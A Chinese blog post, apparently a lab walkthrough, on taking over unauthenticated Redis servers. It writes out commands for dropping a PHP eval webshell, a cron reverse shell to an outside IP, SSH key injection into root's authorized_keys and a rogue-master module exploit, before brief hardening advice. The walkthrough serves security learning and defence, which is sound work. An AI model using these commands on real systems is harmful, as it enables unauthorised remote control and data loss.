redis未授权到getshell

于 2024-06-12 16:50:56 发布
阅读量851 收藏 16
点赞数 28
文章标签: redis 数据库 缓存 网络安全 安全 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68408599/article/details/139631077
版权

0 前言

现在是redis数据库未授权访问到getshell的部分了,不好意思,因为个人原因,和上篇mysql的getshell文章间隔较久.

1 漏洞产生原因

redis安装完之后,默认情况下绑定在 0.0.0.0:6379,且没有对登录IP做限制,并且没有设置密码(默认为空)。

2 漏洞危害

攻击者无需认证即可访问到内部数据,可能导致敏感信息泄露,黑客也可以恶意执行flushall来清空所有数据;

攻击者可通过EVAL执行lua代码,或通过数据备份功能往磁盘写入后门文件;

最严重的情况,如果Redis以root身份运行,黑客可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器。

3 靶场搭建

redis高版本会有一些限制(需要特殊的配置,较为麻烦),所以我们这里利用的是较低版本的redis。

wget https://download.redis.io/releases/redis-6.2.5.tar.gz
tar xzf redis-6.2.5.tar.gz
cd redis-6.2.5
make   #编译,编译成功之后,redis成功安装

3.1 搭建 redis 未授权访问漏洞靶场

redis 启动命令:

cd src
./redis-server

成功启动如下图所示:

3.2 修改配置文件

我们需要修改相关配置文件,文件位置为“/root/redis-6.2.5/redis.conf”。去掉ip绑定,允许除本地外的主机远程登录redis服务,关闭保护模式,允许远程连接redis服务。

修改前,在75行以及94行处进行修改。

修改后:

重启redis服务,并指定相关的conf文件,这样我们修改的东西才会生效。

启动:

./redis-server /root/redis/redis-6.2.5/redis.conf

4 靶场攻击

4.1 未授权访问

1.直接写入shell脚本

1.1前提条件

低版本或者enable-protected-config yes

知道网站绝对路径,并且需要增删改查权限

获取网站路径方式:1、报错 2、phpinfo 3、配置文件 4、 数据库 5、相关数据泄漏

root启动redis

redis弱密码或者无密码

config set dir /www/wwwroot/nxxiake.club/
config set dbfilename nanmus.php
set x "<?php phpinfo();eval($_POST['nanmus']);?>"
save

上传成功,这里我们可以使用哥斯拉进行远程连接

这里发现命令执行不可以,禁用了相关函数,这里不过多讲解。

4.2计划任务

set shell "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/82.157.166.165/5566 0>&1\n\n"
config set dir /var/spool/cron/
config set dbfilename root
save

这里保存失败,找了很久都没找到原因,原来是系统中挖矿了,恶意脚本还禁止了其他的计划任务的写入。感兴趣的朋友可以看看我挖矿病毒应急响应的文章,蛮有意思的。

到靶机上查看,计划任务写入成功:

攻击机开启nc监听,等待反弹shell

一段时间后反弹成功。

4.3 写入公钥

首先,我们需要获取攻击机的公钥(id_rsa.pub),保存为txt文件,并检查相关公钥,显示无异常

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > rsakey.txt
cat rsakey.txt

写入本地公钥至目标靶机

redis-cli -h 49.232.30.123 #连接靶标
config set dir /root/.ssh/  #设置目录
config set dbfilename authorized_keys  #设置文件名
config get dir #检查设置的目录
config get dbfilename #检查设置的文件名
set xz "\n\n\n 你的id_rsa.pub \n\n\n" #写入公钥
save #保存

查看靶机中的公钥,发现已经被攻击机写入了

直接进行ssh连接,登陆成功

ssh  -i  /root/.ssh/id_rsa  root@ip地址

4.4 主从复制

在Reids 4.x之后,Redis新增了模块功能,通过外部拓展,可以实现在Redis中实现一个新的Redis命令,通过写C语言编译并加载恶意的.so文件,达到代码执行的目的。

使用相关脚本(项目地址为GitHub - n0b0dyCN/RedisModules-ExecuteCommand: Tools, utilities and scripts to help you write redis modules!

python3 redis-rogue-server.py --rhost=<target ip> --lhost=<vps ip> --exp=exp.so

vps开启监听

成功获取反弹shell

5 防护建议

  1. 开启密码验证并设置高强度密码
  2. 绑定相关ip,修改相关默认端口,设置白名单访问,或者是内网ip访问
  3. 禁止高权限用户运行redis
  4. 禁用高危命令

6 总结

写入webshell虽然简单便捷,但是很多网站都严格限制了写入规则,但是可以通过定时任务,写入公钥等来获取webshell并建立持久性控制。自己使用需要小心,redis未授权是比较常见的漏洞了,常常被用于执行挖矿病毒,甚至是勒索病毒。

7 参考链接

Redis主从复制漏洞gethsell

Redis源码解析:一条Redis命令是如何执行的?

一文读懂Redis

B10SS0MS
关注
  • 28
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
redis 授权/知道密码 下getshell
问题很多的小明
06-20 469
常用的方法,计划任务,写webshell,主从复制,写公钥文件(会覆盖) 1 写公钥文件 ssh-keygen –t rsa (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > test.txt cat test.txt |redis-cli -h 192.168.0.109 -a 123456 -x set crackit redis-cli -h 192.168.0.109 -a 123456 config set dir /root/
Redis授权访问导致getshell
isxiaole的博客
11-09 3378
redis授权访问导致getshell redis授权访问漏洞利用
Redis授权getshell及修复方案
打工人日记
12-31 647
应用介绍 简单点说就是一个日志型数据库,并有主从同步的功能(优化性能)。 漏洞介绍 默认配置下redis并没有设置密码,被攻击者恶意利用可以导致授权访问,可以有多种利用方式:服务器权限被获取和数据删除、泄露、加密勒索、植入yam2 minerd 挖矿程序、watch-smartd挖矿木马等 安装redis docker run -itd --name redis-test -p 6379:6379 redis 常用命令 ping:检测是否连通且有权限执行命令 info:读取Redis敏感数据 keys:
redis授权getshell四种方式
最新发布
BING
04-24 4197
Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及读取 Redis 的数据。在两个Redis实例设置主从模式的时候,Redis的主机实例可以通过FULLRESYNC同步文件到从机上,然后在从机上加载so文件,我们就可以执行拓展的新命令了。
redis 授权访问及getshell
Guoke324的博客
04-06 695
目录 redis授权访问 redis getshell方法 写 webshell 文件 利用 写SSH key进行 getshell 通过写corntab的方式进行getshell redis授权访问 Redis在默认情况下,会绑定在0.0.0.0:6379,如果没有采用限制IP访问,就会将Redis服务暴露在公网上,并且在没有设置密码认证的情况下,会导致任意用户授权访问Redis以及读取Redis数据并写入公钥进行远程连接等。 利用python去检测,或者...
Redis-Getshell:Redis 授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell
05-05
Redis-Getshell 其中的p参数为了区别端口P我将其改成了a Redis 授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell Usage:python3 RedisGetshell.py -H 127.0.0.1 -P 6379 还可以更完善的,后面有...
redis权限webshell1
08-08
· Regularly review Redis 服务器的配置文件和日志,防止授权访问。 此外,企业内部可以使用 nmap 扫描内网网段的 Redis anonymous access 服务,以检测 Redis 服务器的漏洞。 `nmap -p6379 10.11.0/16 --...
Linux系统所需redis
01-31
Redis是一款开源、高性能的键值对存储数据库...总结来说,Linux系统中的Redis部署涉及到安装、配置、管理和使用等多个方面。了解并掌握这些知识点,对于在Linux环境中高效地使用Redis作为数据存储和处理工具至关重要。
Redis安装整理(window平台和Linux平台)
04-03
- `protected-mode`: 防护模式,防止授权访问。 2. **数据持久化**: - `save`: 规则设置,何时进行RDB快照持久化。 - `appendonly`: 是否开启AOF(Append Only File)持久化。 - `appendfsync`: AOF同步策略...
thinkphp_5.0.9完整版
06-12
- **缓存机制**:集成多种缓存策略,如文件缓存Redis、Memcached等,有效提升数据读取速度。 3. **组件生态** - **Composer管理**:通过`composer.json`文件,利用Composer进行依赖管理,方便集成第三方库。 -...
Pastores_IEADERN:北里奥格兰德神召会牧师名单
07-03
7. 安全性:考虑到数据的敏感性,可能还会涉及到用户认证和授权机制,如session和cookie管理,以及HTTPS加密通信,以保护用户信息不被授权访问。 8. 数据备份和恢复:定期备份数据库是重要的维护工作,以防止数据...
Laravel开发-server-monitor-app
08-28
考虑到服务器监控可能涉及大量数据读写,对数据库进行适当的索引优化,使用缓存减少数据库访问压力,同时考虑使用异步处理(如Redis队列)来处理耗时的操作。 10. **持续集成与部署** 使用Git进行版本控制,配合...
JAVA上百实例源码以及开源项目
01-03
5个目标文件,演示Address EJB的实现,创建一个EJB测试客户端,得到名字上下文,查询jndi名,通过强制转型得到Home接口,getInitialContext()函数返回一个经过初始化的上下文,用client的getHome()函数调用Home接口...
JAVA上百实例源码以及开源项目源代码
12-11
5个目标文件,演示Address EJB的实现 ,创建一个EJB测试客户端,得到名字上下文,查询jndi名,通过强制转型得到Home接口,getInitialContext()函数返回一个经过初始化的上下文,用client的getHome()函数调用Home接口...
利用Redis授权漏洞实现getshell
MD@@nr丫卡uer
01-12 545
(1)写ssh-keygen公钥然后使用私钥登陆 在以下条件下,可以利用此方法 Redis服务使用ROOT账号启动 服务器开放了SSH服务,而且允许使用密钥登录,即可远程写入一个公钥,直接登录远程服务器。 1:本地建立ssh的密钥 ssh-keygen -t rsa Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): ./id_rsa Enter passphrase
Redis授权访问getshell》复现笔记(一)
limb0的博客
09-12 711
Redis授权访问getshell》复现笔记(一) 利用周末复现了一下Redis授权访问getshell,期间遇到了一些坑,虽然结果没什么悬念,却花费了不少时间,故将过程详细记录,留给有需要的人。此贴仅供新手参考,大佬勿喷。 一、 环境介绍 靶机:CentOS 6.5 (点击下载) IP:192.168.17.140 攻击机:Win10(本机) IP:192.168.8.195 二、...
Redis 授权访问漏洞与getshell(附getshell检测工具)
告白的博客
02-24 3974
Redis 简介. Redis 是完全开源免费的,遵守 BSD 协议,是一个灵活的高性能 key-value 数据结构存储,常见用来作为数据库,其在安全配置问题上存在一些问题,如常见的授权范围与Pickle反序列化
Redis授权访问获取shell
R3332136304的博客
12-23 636
Redis 授权访问 Redis默认配置身份鉴别,当端口侦听在公网上时,攻击者可通过Redis授权访问,获取到服务器shell。 上靶场!!! 可以看到服务器开启了两个端口 48965 和 41617,通过搭建 redis 客户端环境,对着两个端口连接测试,发现都可以直接连接到 redis 数据库。 先查看一波,看一下配置保存数据文件的目录,看到是 /var/lib/redis 可以判断是Linux系统主机,而且只有48965端口可以正常使用 看一下保存数据的文件名 通过查看保存文件的所在目录,
Linux下Redis授权访问getshell三种方法 (1、秘钥登录)
daxi0ng的博客
11-26 2355
介绍: REmote DIctionary Server(Redis) 是一个由Salvatore Sanfilippo写的key-value存储系统。 Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。 它通常被称为数据结构服务器,因为值(value)可以是 字符串(String), 哈希(H...
redis授权访问getshell
03-16
Redis授权访问是指Redis服务器的访问控制没有设置好,导致攻击者可以通过Redis的一些命令获取服务器的敏感信息或者执行恶意代码,从而实现getshell的攻击。为了避免这种情况发生,我们需要对Redis服务器进行安全配置,包括设置密码、限制访问IP等措施。同时,也需要及时更新Redis的版本,以防止已知漏洞被攻击利用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

B10SS0MS

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值